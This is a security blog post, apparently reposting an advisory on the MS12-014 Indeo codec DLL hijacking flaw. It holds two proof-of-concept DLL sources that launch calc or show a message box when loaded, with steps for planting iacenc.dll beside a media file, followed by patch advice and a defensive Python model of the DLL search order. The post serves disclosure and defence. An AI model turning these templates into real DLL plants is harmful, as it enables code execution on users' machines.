
K8拉登哥哥's Blog

K8搞基大队[K8team] information security, network security, 0day vulnerabilities, penetration testing, hacking


Microsoft Windows Indeo Filter 'iacenc.dll' DLL Loading Arbitrary Code Execution Vulnerability (MS12-014)

2012-02-16 19:07:42 | Category: 0day vulnerabilities

SSV-ID: 30119
SSV-AppDir: Microsoft Windows
Published: 2012-02-14

Affected versions:

Microsoft Windows Vista
Microsoft Windows Server 2008
Microsoft Windows 7

Vulnerability description:

BUGTRAQ ID: 42730. Microsoft Windows is a widely used operating system. The Windows iac25_32.ax filter resolves a DLL it depends on in an unsafe way: an attacker can get a user to load a DLL from an untrusted directory (the directory of an opened file) and thereby execute arbitrary code with the user's privileges.

Test method:

@Sebug.net
Programs (methods) provided on this site may be offensive in nature and are intended for security research and teaching only; use at your own risk!
/* ---- First proof of concept (build as iacenc.dll) ---- */

/*
Mediaplayer Classic 1.3.2189.0 Dll Hijack Exploit
By: Encrypt3d.M!nd
Date: 25\8\2010
Download: http://mpc-hc.sourceforge.net/

Details:
Compile the following code and rename it to iacenc.dll
and place a file with one of the affected types in the same directory as the dll

Affected types: m2ts, m2t, flv, hdmov, 3gpp, 3gp, mpeg, mp4v, mkv, m2v, rm, ram
(i guess all file types that mpc supports are affected)

Code :(used the one from this advisory:http://www.exploit-db.com/exploits/14758/):
*/

#include <windows.h>
#include <stdlib.h>   /* exit() */
#define DLLIMPORT __declspec (dllexport)

int evil(void);   /* prototype: the function is called before it is defined */

DLLIMPORT void hook_startup() { evil(); }

int evil()
{
    WinExec("calc", 0);   /* proof-of-concept payload: starts calc.exe */
    exit(0);
    return 0;
}


/* ---- Second, separate proof-of-concept source file (mplayerc.c).
   The page pastes both PoCs one after the other; this one is built on its own. ---- */

/*
Media Player Classic 6.4.9.1 (iacenc.dll) DLL Hijacking Exploit

Vendor: Gabest
Product Web Page: http://sourceforge.net/projects/guliverkli
Affected Version: 6.4.9.1 (revision 73)

Summary: Media Player Classic (MPC) is a compact media player for
32-bit Microsoft Windows. The application mimics the look and feel
of the old, lightweight Windows Media Player 6.4 but integrates
most options and features found in modern media players. It and
its forks are standard media players in the K-Lite Codec Pack and
the Combined Community Codec Pack.

Desc: Media Player Classic suffers from a dll hijacking vulnerability
that enables the attacker to execute arbitrary code on a local
level. The vulnerable extensions are .mka, .ra and .ram through the iacenc.dll
library.

----
gcc -shared -o iacenc.dll mplayerc.c

Compile and rename to iacenc.dll, create a file test.mka or any of the
above vulnerable extensions and put both files in the same dir and execute.
----

Tested on Microsoft Windows XP Professional SP3 (EN)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com

Zero Science Lab - http://www.zeroscience.mk

25.08.2010
*/

#include <windows.h>

int dll_mll(void);   /* prototype: called from DllMain before it is defined */

BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    switch (fdwReason)
    {
    case DLL_PROCESS_ATTACH:
        dll_mll();        /* runs as soon as the loader maps the planted DLL */
        /* fall through */
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }

    return TRUE;
}

int dll_mll()
{
    MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);   /* visible marker that the plant was loaded */
    return 0;
}

Security advice:

Vendor patch: Microsoft
---------
Microsoft has released a security bulletin (MS12-014) and the corresponding patch:
MS12-014: Vulnerability in the Indeo Codec Could Allow Remote Code Execution (2661637)
Link: http://www.microsoft.com/technet/security/bulletin/MS12-014.asp
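Why does a copy of iacenc.dll dropped beside a media file get loaded at all? Because the name is not shipped with Windows, so the loader walks its whole search order without finding a legitimate copy and ends up in the current directory, which is the directory of the file the user opened. The vendor fix, and the general hardening of removing the current directory from DLL resolution (SetDllDirectory("") or the LOAD_LIBRARY_SEARCH_* flags), close exactly that gap. The Python model below is an added example and is not code from the Sebug advisory, from Microsoft, or from the PoCs above; the directory names and file contents are constructed for the example, and the search order it encodes is the documented Windows default with SafeDllSearchMode on (application directory, System32, 16-bit System directory, Windows directory, current directory, PATH), leaving out KnownDLLs and manifests. The audit function at the end shows the defender's side: a DLL name that exists only in user-writable directories and nowhere in the trusted ones is the shape of this kind of plant.

```python
"""Model of the Windows DLL search order behind the iacenc.dll plant.

Added example; not code from the advisory or the PoCs. All paths and
directory contents are constructed. The order modelled is the documented
default (SafeDllSearchMode on); KnownDLLs and manifests are ignored.
"""

APP_DIR = r"C:\Program Files\Player"            # constructed application directory
SYSTEM32 = r"C:\Windows\System32"
SYSTEM16 = r"C:\Windows\System"
WINDIR = r"C:\Windows"
MEDIA_DIR = r"C:\Users\victim\Downloads\shared"  # directory the .ram file was opened from
PATH_DIRS = [r"C:\Users\victim\bin"]            # constructed PATH entry

# Constructed file system. iacenc.dll is not shipped with Windows, so the only
# copy anywhere is the one planted next to the media file.
FS = {
    APP_DIR: {"mplayerc.exe", "unrar.dll"},
    SYSTEM32: {"kernel32.dll", "user32.dll", "iac25_32.ax"},
    SYSTEM16: set(),
    WINDIR: {"explorer.exe"},
    MEDIA_DIR: {"clip.ram", "iacenc.dll"},
    PATH_DIRS[0]: {"helper.dll"},
}

TRUSTED_DIRS = {APP_DIR, SYSTEM32, SYSTEM16, WINDIR}


def search_order(cwd, safe_dll_search_mode=True, cwd_in_search=True):
    """Directories probed, in order, for an unqualified DLL name.

    cwd_in_search=False models SetDllDirectory("") / LOAD_LIBRARY_SEARCH_*,
    which drop the current directory from the search entirely.
    safe_dll_search_mode=False models the legacy order, where the current
    directory is probed right after the application directory.
    """
    system_dirs = [SYSTEM32, SYSTEM16, WINDIR]
    cwd_part = [cwd] if cwd_in_search else []
    if safe_dll_search_mode:
        return [APP_DIR] + system_dirs + cwd_part + PATH_DIRS
    return [APP_DIR] + cwd_part + system_dirs + PATH_DIRS


def resolve(dll_name, order, fs=FS):
    """Return the directory whose copy of dll_name the loader would pick, or None."""
    wanted = dll_name.lower()
    for directory in order:
        if wanted in {f.lower() for f in fs.get(directory, set())}:
            return directory
    return None


def classify_load(dll_name, order, fs=FS):
    """Defender's view of one load: 'trusted', 'untrusted' or 'not found'."""
    where = resolve(dll_name, order, fs)
    if where is None:
        return "not found"
    return "trusted" if where in TRUSTED_DIRS else "untrusted"


def audit_planted_dlls(fs=FS):
    """List (name, directory) for DLLs that exist only outside the trusted dirs.

    With no legitimate copy for the loader to find first, such a file is
    loaded as soon as any process with that directory as its current
    directory asks for the name, which is the iacenc.dll case exactly.
    """
    trusted_names = set()
    for d in TRUSTED_DIRS:
        trusted_names |= {f.lower() for f in fs.get(d, set())}
    findings = []
    for d, files in fs.items():
        if d in TRUSTED_DIRS:
            continue
        for f in sorted(files):
            if f.lower().endswith(".dll") and f.lower() not in trusted_names:
                findings.append((f, d))
    return findings


if __name__ == "__main__":
    default = search_order(cwd=MEDIA_DIR)
    hardened = search_order(cwd=MEDIA_DIR, cwd_in_search=False)
    print("iacenc.dll, default order :", classify_load("iacenc.dll", default),
          "from", resolve("iacenc.dll", default))
    print("iacenc.dll, cwd removed   :", classify_load("iacenc.dll", hardened))
    print("user32.dll, default order :", classify_load("user32.dll", default))
    for name, d in audit_planted_dlls():
        print("candidate plant:", name, "in", d)
```

The two knobs on search_order separate the two protections: SafeDllSearchMode (on by default since XP SP2) only helps for names that do exist in a system directory, since the system directories are then probed before the current directory; for a name that exists nowhere, like iacenc.dll, the only effective fix is to keep the current directory out of the search altogether, which is what the hardened order does.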
@Sebug.net [ 2012-02-16 ]
Copyright © NetEase 1997-2016